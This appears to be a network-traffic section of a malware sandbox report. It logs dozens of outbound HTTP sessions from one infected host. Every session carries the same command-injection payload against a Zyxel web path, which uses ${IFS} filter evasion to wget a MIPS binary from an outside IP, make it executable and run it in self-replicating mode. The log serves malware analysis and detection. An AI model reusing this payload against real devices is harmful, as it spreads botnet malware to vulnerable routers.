                                          Jan 14, 2024 15:46:05.793468952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2006192.168.2.2334128103.169.189.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793493032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2007192.168.2.233887262.231.184.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793514967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2008192.168.2.2333050189.149.124.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793576002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2009192.168.2.2351576136.24.134.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793590069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2010192.168.2.2358778111.159.169.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793622017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2011192.168.2.2357236139.29.119.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793677092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2012192.168.2.2348948188.52.147.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793713093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2013192.168.2.2353620174.197.4.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793747902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2014192.168.2.235698235.249.132.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793808937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2015192.168.2.2340174152.143.188.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793852091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2016192.168.2.2341964112.5.243.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793867111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2017192.168.2.2351886196.46.149.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793900967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2018192.168.2.234776681.239.43.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793929100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2019192.168.2.2354386191.179.158.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793946981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2020192.168.2.2339404167.87.91.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793987036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2021192.168.2.234470877.105.183.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794020891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2022192.168.2.2343832137.110.51.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794040918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2023192.168.2.2335622100.127.81.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794075012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2024192.168.2.235951031.120.41.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794102907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2025192.168.2.233355269.211.103.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794106007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2026192.168.2.233684083.218.108.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794131041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2027192.168.2.235491096.207.50.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794171095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2028192.168.2.2360358197.2.112.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794224024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2029192.168.2.2350680198.13.135.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794225931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2030192.168.2.2360622119.125.222.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794270992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2031192.168.2.235936614.120.78.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794297934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2032192.168.2.235498085.39.1.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794351101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2033192.168.2.235308083.174.22.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794365883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2034192.168.2.23575741.205.71.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794410944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2035192.168.2.2348100144.20.46.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794444084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2036192.168.2.234469285.235.190.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794476032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2037192.168.2.234917083.248.77.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.794506073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2038192.168.2.2357808199.111.19.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.797871113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2039192.168.2.234646894.209.59.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.791958094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2040192.168.2.2336174119.245.164.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.791965008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2041192.168.2.234163087.60.128.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792018890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2042192.168.2.2359210153.32.18.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792021036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2043192.168.2.2334490171.63.55.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792062044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2044192.168.2.2348082112.87.54.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792068005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2045192.168.2.2352514146.59.154.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792105913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2046192.168.2.234317888.161.236.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792141914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2047192.168.2.234616462.43.61.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792166948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2048192.168.2.2339284194.152.99.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792207956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2049192.168.2.235482274.56.62.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792207956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2050192.168.2.234736825.156.119.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792262077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2051192.168.2.2332882152.246.214.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792294025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2052192.168.2.2334884186.96.176.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792305946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2053192.168.2.2349838113.44.242.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792335033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2054192.168.2.2346936217.45.147.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792370081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2055192.168.2.2333604111.208.158.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792421103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2056192.168.2.234038689.59.144.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792421103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2057192.168.2.2356110111.179.193.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792454958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2058192.168.2.235741618.28.238.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792471886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2059192.168.2.2355466147.149.81.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792498112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2060192.168.2.2348662151.62.167.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792532921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2061192.168.2.2350014178.122.234.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792572021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2062192.168.2.233742685.41.98.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792613029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2063192.168.2.2345450222.73.81.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792629004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2064192.168.2.2358606169.141.201.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792658091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2065192.168.2.2360650156.140.200.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792682886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2066192.168.2.2359728177.154.163.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792707920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2067192.168.2.234123025.17.233.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792743921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2068192.168.2.233921058.116.175.75443
                                          TimestampBytes transferredDirectionData
